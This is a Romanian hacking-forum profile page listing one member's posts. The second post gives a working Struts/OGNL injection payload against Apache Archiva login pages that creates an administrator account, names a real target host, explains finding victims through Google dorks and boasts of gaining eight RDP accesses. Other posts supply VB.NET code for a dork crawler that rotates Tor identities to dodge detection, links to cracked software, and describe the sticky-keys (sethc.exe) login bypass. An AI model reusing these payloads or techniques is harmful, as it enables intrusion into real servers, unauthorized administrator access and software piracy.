Jump to content

Maximus

Active Members
  • Posts

    1481
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by Maximus

  1. Maximus

    Fun stuff

  2. Daca tot am postat asta, uite ce-am incercat pana acum si-a mers pas 1 /archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} pas 2 inca nu am automatizat procesul dar se face asa ; se cauta pe google "Apache Archiva login page" ex. link vuln. : Apache Archiva \ Login Page se adauga in ordine pasu 1 si pasu 2 de mai sus ex : pas1 http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} pas2 http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} explicatie: (pas1) se creaza fisierul _.bat care contine "net user administrator rstcenter!" in serverul care hosteaza apache archiva ; pas2 se executa fisierul _.bat la ora 12:00 (nu chiar 00) am descoperit exploitu ; la 2:56 am deja 8 RDP-uri (bunute) spor P.S. va trebui sa va chinuiti putin, nu o ia din prima ; nu stiu de ce....
  3. nu e, m-am exprimat gresit, scz, dar merge chestia aia desi ai putea sa faci singur treaba asta, pui poza de la google cu alt link ... nu ?
  4. ma nuj cum plm, ce ziceti voi acolo dar eu am incercat si merge, nu e genu de redirect la care te astepti dar merge
  5. chiar ar fi ceva ! sustin sustin sustin.
  6. pentru a extrage pana la ultima pagina poti proceda asa : Delegate Sub SetTextDelegate(ByVal sText As String, ByVal c As Color) Private SetText As New SetTextDelegate(AddressOf SetTextBoxText) Private Sub SetTextBoxText(ByVal sText As String, ByVal color As Color) With Me.RichTextBox1 .SelectionStart = .TextLength .SelectionColor = color .AppendText(sText & Environment.NewLine) .SelectionColor = .ForeColor End With RichTextBox1.ScrollToCaret() End Sub 1. functia Public Function GBA_GOOGLE(ByRef strSource As String, ByRef strStart As String, ByRef strEnd As String, Optional ByRef startPos As Integer = 0) As List(Of String) Dim iPos As Integer, iEnd As Integer, strResult As String, lenStart As Integer = strStart.Length Dim L As New List(Of String) Do Until iPos = -1 strResult = String.Empty iPos = strSource.IndexOf(strStart, startPos) iEnd = strSource.IndexOf(strEnd, iPos + lenStart) If iPos <> -1 AndAlso iEnd <> -1 Then strResult = strSource.Substring(iPos + lenStart, iEnd - (iPos + lenStart)) L.Add(strResult) startPos = iPos + lenStart End If Loop Return L End Function 2. functia Private Function GetBetween(ByVal sSearch As String, ByVal sStart As String, ByVal sStop As String, Optional ByVal lSearch As Integer = 1) As String Dim lTemp As Long lSearch = InStr(lSearch, sSearch, sStart) If lSearch > 0 Then lSearch = lSearch + Len(sStart) lTemp = InStr(lSearch, sSearch, sStop) If lTemp > lSearch Then Return Trim(Mid$(sSearch, lSearch, lTemp - lSearch)) End If Return vbNullString End Function 3. asta il lasezi in thread nou , dar trebuie sa le controlezi daca faci un for each Public Sub Crwl() For Each Dork As String In Dorks If CheckBox1.Checked = True Then Dim X As New System.Threading.Thread(AddressOf Gcrawl) X.IsBackground = True X.Start(TextBox2.Text.Replace("%dork%", Dork)) Invoke(SetText, New Object() {"Thread started for : " & TextBox2.Text.Replace("%dork%", Dork), Color.Lime}) CurrentThreads += 1 Do While CurrentThreads >= MaxThreads System.Threading.Thread.Sleep(1000) Loop End If Next End Sub Public MaxThreads as integer = 5 CurrentThreads : Public CurrentThreads as integer = 0 cand lansezi un thread faci CurrentThreads +=1 in thread , inainte de END SUB pui CurrentThreads -=1 4. crawl thread Public Sub Gcrawl(ByVal URL As Object) Dim x As New System.Threading.Thread(AddressOf GetGoogleResult) x.IsBackground = True x.Start(URL) System.Threading.Thread.Sleep(3000) CurrentThreads -= 1 End Sub 5. crawl extract thread Public Sub GetGoogleResult(ByVal URL As String) Dim Http As New Chilkat.Http Dim success As Boolean success = Http.UnlockComponent("Anything for 30-day trial") If (success <> True) Then Invoke(SetText, New Object() {"Failed to activate Chilkat Component.", Color.Red}) Invoke(SetText, New Object() {"Thread exit.", Color.Red}) Exit Sub End If Dim html As String Http.UserAgent = "Mozilla/5.0 (Windows NT 5.1; WOW86; rv:26.0) Gecko/21100101 Firefox/25.0" Http.FollowRedirects = True html = Http.QuickGetStr(URL) If (html = vbNullString) Then Invoke(SetText, New Object() {"Google has detected our crawl.", Color.Red}) GooGL = True Exit Sub End If html = html.Replace(Chr(34), "'") Dim nextq As String = String.Empty Try nextq = GetBetween(html, "</a></td><td class='b navend'><a href='", "' class='pn' id='pnnext' style='text-decoration:none;text-align:left'>").Replace("&", "&") Catch ex As Exception nextq = String.Empty Invoke(SetText, New Object() {"Search ended !", Color.Lime}) End Try Invoke(SetText, New Object() {"Next URL : http://" & Http.GetDomain(URL) & nextq, Color.Lime}) For Each result As String In GBA_GOOGLE(html, "<h3 class='r'><a href='", "' onmousedown='return") If Not result.Contains("http") Then result = "http://" & result End If For Each ign As String In Ignore If Not result.Contains(ign.ToString) And Not found.Contains(result) Then Invoke(SetText, New Object() {"Found " & result, Color.Blue}) found.Add(result) o.WriteLine(result) o.Flush() End If Next Next If html.Contains("may be sending automated queries") Then Invoke(SetText, New Object() {"Google has detected our crawl.", Color.Red}) Exit Sub ElseIf String.IsNullOrEmpty(nextq) Then Invoke(SetText, New Object() {"Search ended !", Color.Lime}) CurrentThreads -= 1 Exit Sub Else Do While CurrentThreads >= MaxThreads System.Threading.Thread.Sleep(5000) Loop System.Threading.Thread.Sleep(3000) Dim X As New System.Threading.Thread(AddressOf Gcrawl) X.IsBackground = True X.Start("http://" & Http.GetDomain(URL) & nextq) CurrentThreads += 1 End If Http.Dispose() End Sub asta intra pe google, ia linkurile , extrage url-ul de sub NEXT (adica url-ul cu pagina urmatoare) si lanseaza un thread now crwl pentru linkul NEXT (se face un loop ca sa zic asa, care se opreste cand NEXT url nu mai este gasit) bine eu ti-am dat un exemplu gen thread -> thread -> thread(crawl) , un thread este lasat cam degeaba dar isi face treaba (Tu il poti simplifica) eu am folosit chilkat pentru .NET Chilkat Zip Component, .NET Email Component, SMTP Component, Encryption, Compression, IMAP, POP3, SSH, SFTP Component, FTP, Zip, S/MIME, XML, ActiveX, Assembly, HTTP, C#, VB.NET, ASP.NET, C++, Delphi, Library, Upload , crack aici : https://rstforums.com/forum/73805-rst-chilkat-net-component-crack.rst recomand chilkat pentru ca poti seta proxy cu usurinta.incearca sa folosesti tor onion la crawl ; dupa fiecare crawl faci un sleep , te conectezi la tor (am uitat portu pentru semnale tor) , trimiti "NEWNYM" (new identity) dupa care treci la urmatorul dork .. si tot asa. Spor
  7. felicitari ! esti prost ! troll : a instalat 2x linux via vmware si a dat un udp.pl pana si-a ars modemu
  8. asta e de penale ....
  9. Update 1/22/1014 - Ver 1.8.0.0 +chilkat crack Download https://www.dropbox.com/s/xs8vwmj8w62mk2v/%5BRST%5D%20Post%20Hunter.rar
  10. tu esti unicul responsabil pentru ce s-a intamplat ; multe din ele sunt copy-pasted de pe alte forumuri, nu poti invinovati pe nimeni .. decat pe tine pentru ca nu ai rulam in VM
  11. Live CD, faci un Live CD cu windows xp/7 (cred ca 7 e cel mai recomandat) , dupa ce boot-ezi de pe Live CD te duci in X:\Windows\System32\ si dai asa din cmd.exe "del sethc.exe" ; "copy cmd.exe sethc.exe" , dai restart ; scoti DVD-ul/CD-ul lasi sa intre in windows normal ; la logon dai 5x SHIFT and voila simple as 1 2 3
  12. nu exista limite
  13. am incercat dar nu merge, am luat din lista mea de prieteni cu acel email de la fb, nu merge (am folosit tor ca proxy) pur si simplu nu merge
  14. Felicitari, +like +rep
  15. Catch ex As Exception MsgBox(ex.tostring) End Try ca sa vezi unde e problema, desi eu cred ca e de la port incearca fara ssl
  16. Sunt curios. Multumesc anticipat.
  17. nu merge pe vmware cu xp x32 ... imi porneste, il vad in procese, apoi se inchide singur, nu am cum sa pun win7 pe masina pentru ca nu am destule resurse ...
  18. am facut niste greseli aseara in lista de admini/moderatori si de aseara pana acum 2 minute PostHunter dadea crash, scuze; am rezolvat problema
  19. asta nu e un bomber, sorry +like
  20. nu l-am testat. dar felicitari. p.s. era frumos sa faci si un video demonstrativ, doar ca sa arati ca merge;)
  21. La Multi Ani RST!!!!!
  22. Adica acum te adresezi lor in mod indirect nu ? Probabil nu au destule dovezi din partea ta.Poate ai spart site-u ai pus imaginea si etc ... off : "you are like a blood clot, that needs to be surgically removed"
  23. Daca te arunci in Dunare vei primi cadou un Iphone 5 Ipad 3 si un Nokia Lumia de la Sf. Petru cand ajungi la portile raiului. (te arunci ?) Normal ca e o porcarie.
  24. Craciun Fericit RST!
×
×
  • Create New...